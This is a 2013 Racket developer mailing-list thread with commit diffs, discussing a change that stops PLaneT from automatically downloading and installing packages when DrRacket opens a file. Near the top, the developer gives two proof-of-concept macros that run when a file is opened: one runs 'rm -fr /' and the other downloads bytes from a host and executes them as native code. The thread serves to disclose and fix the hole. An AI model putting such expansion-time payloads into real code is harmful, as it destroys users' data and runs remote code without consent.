[racket-dev] [plt] Push #27862: master branch updated
If I have background expansion on, then when I open that file it
installs the package.
Since once a Planet package is installed it is set up and compiled
that means that this code:
#lang racket
(attack)
(define-syntax (attack stx)
(system "rm -fr /"))
is automatically run as soon as I open it up.
Furthermore, I could do something like this:
#lang racket
(attack)
(define-syntax (attack stx)
(local-require (only-in '#%foreign ffi-call _int32)
net/http-client)
(define-values (s hs ip)
(http-sendrecv "example.com" "/"))
(define bs (port->bytes ip))
(printf "got: ~v\n" bs)
(define weird-c-code bs)
((ffi-call weird-c-code null _int32)))
and really execute any C code that I could find on the Internet.
This isn't just a DrRacket problem though. We should not be
arbitrarily installing things on people's machines without their
consent. This power is too much.
The new system of suggesting an install or allowing an opt-in for
certain vetted packages is much kinder.
Jay
On Wed, Nov 27, 2013 at 5:35 PM, Robby Findler
<robby at eecs.northwestern.edu> wrote:
> Can you demonstrate how to make this happen? Opening a file with these
> contents, for example, doesn't install anything.
>
> #lang racket
> (require (planet planet/test-connection:1:0/test-connection))
>
> As for automatically executing arbitrary code, I think you must mean
> something more precise here. Perhaps "code that hasn't already been
> explicitly installed"? If that's what you mean, then I think I'm also
> missing how this happens.
>
> Robby
>
>
> On Wed, Nov 27, 2013 at 4:42 PM, Jay McCarthy <jay at racket-lang.org> wrote:
>>
>> There is an important change in this commit. Since we've created the
>> release branch for 6.0, I think we should stop automatically
>> installing and executing arbitrary code when people open files in
>> DrRacket. Currently the error message suggests using "raco planet" but
>> I think we need a bit of a GUI shim for other users.
>>
>> On Wed, Nov 27, 2013 at 3:40 PM, <jay at racket-lang.org> wrote:
>> > jay has updated `master' from 033065f632 to 60ae164d05.
>> > http://git.racket-lang.org/plt/033065f632..60ae164d05
>> >
>> > =====[ 6 Commits ]======================================================
>> > Directory summary:
>> > 57.6% pkgs/plt-services/meta/pkg-index/official/static/
>> > 17.6% pkgs/plt-services/meta/pkg-index/official/
>> > 22.0% racket/collects/planet/private/
>> >
>> > ~~~~~~~~~~
>> >
>> > 2413278 Jay McCarthy <jay at racket-lang.org> 2013-11-27 14:51
>> > :
>> > | moving delete button
>> > :
>> > M .../meta/pkg-index/official/static/index.html | 2 ++
>> > M .../meta/pkg-index/official/static/index.js | 16
>> > +++++++++-------
>> > M .../meta/pkg-index/official/static/style.css | 4 ++++
>> >
>> > ~~~~~~~~~~
>> >
>> > 113696c Jay McCarthy <jay at racket-lang.org> 2013-11-27 14:54
>> > :
>> > | edit on lose focus
>> > :
>> > M pkgs/plt-services/meta/pkg-index/official/static/index.js | 4 +++-
>> >
>> > ~~~~~~~~~~
>> >
>> > cf1755f Jay McCarthy <jay at racket-lang.org> 2013-11-27 15:19
>> > :
>> > | Remove arbitrary code execution exploit from Racket and DrRacket
>> > |
>> > | This is particularly bad with DrRacket's online syntax checking, which
>> > | causes opening a file to download and executed aribtrary code.
>> > :
>> > M racket/collects/planet/private/resolver.rkt | 8 ++++----
>> >
>> > ~~~~~~~~~~
>> >
>> > 98df30c Jay McCarthy <jay at racket-lang.org> 2013-11-27 15:30
>> > :
>> > | deleting static s3 content properly
>> > :
>> > M pkgs/plt-services/meta/pkg-index/official/static.rkt | 11
>> > ++++++++++-
>> >
>> > ~~~~~~~~~~
>> >
>> > 7b7a5ad Jay McCarthy <jay at racket-lang.org> 2013-11-27 15:33
>> > :
>> > | increase pkg test timeout
>> > :
>> > M pkgs/plt-services/meta/props | 2 +-
>> >
>> > ~~~~~~~~~~
>> >
>> > 60ae164 Jay McCarthy <jay at racket-lang.org> 2013-11-27 15:39
>> > :
>> > | Removing add tag button when not logged in re mflatt
>> > :
>> > M pkgs/plt-services/meta/pkg-index/official/static/index.js | 11
>> > +++++++++--
>> > M .../plt-services/meta/pkg-index/official/static/index.html | 2 +-
>> >
>> > =====[ Overall Diff ]===================================================
>> >
>> > pkgs/plt-services/meta/pkg-index/official/static.rkt
>> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>> > --- OLD/pkgs/plt-services/meta/pkg-index/official/static.rkt
>> > +++ NEW/pkgs/plt-services/meta/pkg-index/official/static.rkt
>> > @@ -304,7 +304,16 @@
>> > (cache "/pkgs" "pkgs")
>> > (cache "/pkgs-all" "pkgs-all")
>> > (for ([p (in-list pkg-list)])
>> > - (cache (format "/pkg/~a" p) (format "pkg/~a" p))))
>> > + (cache (format "/pkg/~a" p) (format "pkg/~a" p)))
>> > +
>> > + (let ()
>> > + (define pkg-path (build-path static-path "pkg"))
>> > + (for ([f (in-list (directory-list pkg-path))]
>> > + #:unless (regexp-match #"json$" (path->string f))
>> > + #:unless (member (path->string f) pkg-list))
>> > + (with-handlers ([exn:fail:filesystem? void])
>> > + (delete-file (build-path pkg-path f))
>> > + (delete-file (build-path pkg-path (path-add-suffix f
>> > #".json")))))))
>> >
>> > (module+ main
>> > (require racket/cmdline)
>> >
>> > pkgs/plt-services/meta/pkg-index/official/static/index.html
>> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>> > --- OLD/pkgs/plt-services/meta/pkg-index/official/static/index.html
>> > +++ NEW/pkgs/plt-services/meta/pkg-index/official/static/index.html
>> > @@ -54,12 +54,14 @@
>> > <tr><td>Last Edit:</td><td><span
>> > id="pi_last_edit"></span></td></tr>
>> > <tr><td>Description:</td><td><span
>> > id="pi_description"></span></td></tr>
>> > <tr><td>Tags:</td><td><span id="pi_tags"></span></td></tr>
>> > - <tr><td></td><td><input type="text" id="pi_add_tag_text"
>> > class="text ui-widget-content ui-corner-all" /><button
>> > id="pi_add_tag_button">Add Tag</button></td></tr>
>> > + <tr id="pi_add_tag_row"><td></td><td><input type="text"
>> > id="pi_add_tag_text" class="text ui-widget-content ui-corner-all" /><button
>> > id="pi_add_tag_button">Add Tag</button></td></tr>
>> > <tr id="pi_versions_row"><td>Versions Exceptions</td><td><table
>> > id="pi_versions"></table></td></tr>
>> > <tr
>> > id="pi_add_version_row"><td></td><td><label>Version:</label> <input
>> > type="text" id="pi_add_version_text" class="text ui-widget-content
>> > ui-corner-all" /><br /><label>Source:</label> <input type="text"
>> > id="pi_add_version_source_text" class="text ui-widget-content ui-corner-all"
>> > /><button id="pi_add_version_button">Add Version
>> > Exception</button></td></tr>
>> > <tr id="pi_dependencies_row"><td>Dependencies</td><td><span
>> > id="pi_dependencies"></span></td></tr>
>> > <tr id="pi_conflicts_row"><td>Conflicts</td><td><span
>> > id="pi_conflicts"></span></td></tr>
>> > <tr><td>Modules</td><td><span id="pi_modules"></span></td></tr>
>> > + <tr id="pi_delete_row"><td colspan="2"><button
>> > id="pi_delete_button">Delete
>> > + Package</button><br />(there is no undo!)</td></tr>
>> > </table>
>> >
>> > <div id="pi_install" class="install">Install this package
>> > with:<br><br><tt>raco pkg install <span
>> > id="pi_name_inst"></span></tt><br><br>or, with the 'File|Install Package...'
>> > menu option in DrRacket.</div>
>> >
>> > pkgs/plt-services/meta/pkg-index/official/static/index.js
>> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>> > --- OLD/pkgs/plt-services/meta/pkg-index/official/static/index.js
>> > +++ NEW/pkgs/plt-services/meta/pkg-index/official/static/index.js
>> > @@ -8,6 +8,8 @@ function me () {
>> > return localStorage['email']; }
>> >
>> > $( document ).ready(function() {
>> > + var logged_in = false;
>> > +
>> > function jslink ( texts, clickf) {
>> > return $('<a>', { href: "javascript:void(0)",
>> > click: clickf } ).html(texts); }
>> > @@ -43,7 +45,7 @@ $( document ).ready(function() {
>> > update_package_on_list ( pkgi );
>> > // console.log( pkgi );
>> > change_hash( "[" + pkgi['name'] + "]" );
>> > -
>> > +
>> > var mypkg_p = ($.inArray(me(), pkgi['authors'] ) != -1);
>> >
>> > function make_editbutton ( spot, initv, fun ) {
>> > @@ -56,17 +58,20 @@ $( document ).ready(function() {
>> > var it = $( "#" + spot +
>> > "_text" );
>> > it.keypress( function (e) {
>> > if (e.which == 13) {
>> > fun (it.val()); } } );
>> > + it.focusout( function (e) {
>> > + fun (it.val()); } );
>> > it.val(initv).focus(); } )
>> > ); } }
>> >
>> > $( "#pi_name" ).text( pkgi['name'] );
>> > make_editbutton ( "pi_name", pkgi['name'], submit_mod_name );
>> > if ( mypkg_p ) {
>> > - $( "#pi_name" ).append( $('<button>')
>> > - .button({ icons: { primary:
>> > "ui-icon-trash" } })
>> > - .click( function (e) {
>> > - dynamic_pkgsend(
>> > "/jsonp/package/del", { } );
>> > - $(pkgi['dom_obj']).remove();
>> > -
>> > $("#package_info").dialog("close"); } ) ); }
>> > + $( "#pi_delete_button" ).click( function (e) {
>> > + dynamic_pkgsend( "/jsonp/package/del", { } );
>> > + $(pkgi['dom_obj']).remove();
>> > + $("#package_info").dialog("close"); } );
>> > + $( "#pi_delete_row" ).show(); }
>> > + else {
>> > + $( "#pi_delete_row" ).hide(); }
>> >
>> > $( "#pi_name_inst" ).text( pkgi['name'] );
>> > $( "#pi_ring" ).text( pkgi['ring'] );
>> > @@ -104,6 +109,10 @@ $( document ).ready(function() {
>> > " "]; }
>> > else {
>> > return [tag, " "]; } } ) ));
>> > + if ( logged_in ) {
>> > + $( "#pi_add_tag_row" ).show(); }
>> > + else {
>> > + $( "#pi_add_tag_row" ).hide(); }
>> >
>> > $( "#pi_versions" ).html("").append( $.map(
>> > Object.keys(pkgi['versions']).sort(), function ( v, vi ) {
>> > var vo = pkgi['versions'][v];
>> > @@ -494,8 +503,10 @@ $( document ).ready(function() {
>> > $( "#login_code_row" ).hide();
>> >
>> > function menu_logout () {
>> > + logged_in = false;
>> > $("#logout").html( jslink( "login", function () { $( "#login"
>> > ).dialog( "open" ); } ) ); }
>> > function menu_loggedin ( curate_p ) {
>> > + logged_in = true;
>> > $("#logout").html("")
>> > .append( me(),
>> > ( curate_p ? [ " (", jslink( "curator", function
>> > () {
>> >
>> > pkgs/plt-services/meta/pkg-index/official/static/style.css
>> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>> > --- OLD/pkgs/plt-services/meta/pkg-index/official/static/style.css
>> > +++ NEW/pkgs/plt-services/meta/pkg-index/official/static/style.css
>> > @@ -150,3 +150,7 @@ a.possible {
>> > text-align: center;
>> > color: red;
>> > }
>> > +
>> > +tr#pi_delete_row td {
>> > + text-align: center;
>> > +}
>> >
>> > pkgs/plt-services/meta/props
>> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>> > --- OLD/pkgs/plt-services/meta/props
>> > +++ NEW/pkgs/plt-services/meta/props
>> > @@ -1289,7 +1289,7 @@ path/s is either such a string or a list of them.
>> > "pkgs/racket-pkgs/racket-test/tests/openssl/basic.rkt" drdr:random #t
>> > "pkgs/racket-pkgs/racket-test/tests/pkg" responsible (jay)
>> > drdr:command-line (mzc *)
>> > "pkgs/racket-pkgs/racket-test/tests/pkg/test-pkgs" drdr:command-line #f
>> > -"pkgs/racket-pkgs/racket-test/tests/pkg/test.rkt" drdr:command-line
>> > (raco "test" *) drdr:timeout 600
>> > +"pkgs/racket-pkgs/racket-test/tests/pkg/test.rkt" drdr:command-line
>> > (raco "test" *) drdr:timeout 2400
>> > "pkgs/racket-pkgs/racket-test/tests/racket" responsible (mflatt)
>> > "pkgs/racket-pkgs/racket-test/tests/racket/all.rktl" drdr:command-line
>> > #f
>> > "pkgs/racket-pkgs/racket-test/tests/racket/basic.rktl"
>> > drdr:command-line #f
>> >
>> > racket/collects/planet/private/resolver.rkt
>> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>> > --- OLD/racket/collects/planet/private/resolver.rkt
>> > +++ NEW/racket/collects/planet/private/resolver.rkt
>> > @@ -219,9 +219,9 @@ See the scribble documentation on the
>> > planet/resolver module.
>> > (struct-out exn:fail:planet))
>> >
>> > ;; if #f, will not install packages and instead raise a
>> > exn:fail:install? error
>> > -(define install? (make-parameter #t))
>> > +(define install? (make-parameter #f))
>> > ;; if #f, will not download packages and instead raise a
>> > exn:fail:install? error
>> > -(define download? (make-parameter #t))
>> > +(define download? (make-parameter #f))
>> > (define-struct (exn:fail:planet exn:fail) ())
>> >
>> > ;; update doc index only once for a set of installs:
>> > @@ -541,7 +541,7 @@ See the scribble documentation on the
>> > planet/resolver module.
>> > (unless (download?)
>> > (raise (make-exn:fail:planet
>> > (format
>> > - "PLaneT error: cannot download package ~s since the
>> > download? parameter is set to #f"
>> > + "PLaneT error: cannot download package ~s without
>> > permission. Give permission with download? parameter or use 'raco planet
>> > install'"
>> > (list (car (pkg-spec-path pkg)) (pkg-spec-name pkg)))
>> > (current-continuation-marks))))
>> > ((if (USE-HTTP-DOWNLOADS?) download-package/http
>> > download-package/planet)
>> > @@ -577,7 +577,7 @@ See the scribble documentation on the
>> > planet/resolver module.
>> > (unless (install?)
>> > (raise (make-exn:fail:planet
>> > (format
>> > - "PLaneT error: cannot install package ~s since the
>> > install? parameter is set to #f"
>> > + "PLaneT error: cannot install package ~s without
>> > permission. Give permission with download? parameter or use 'raco planet
>> > install'"
>> > (list (car pkg-path) pkg-name maj min))
>> > (current-continuation-marks))))
>> > (define owner (car pkg-path))
>>
>> _________________________
>> Racket Developers list:
>> http://lists.racket-lang.org/dev
>
>
![[logo]](/logo.png){kind=logo}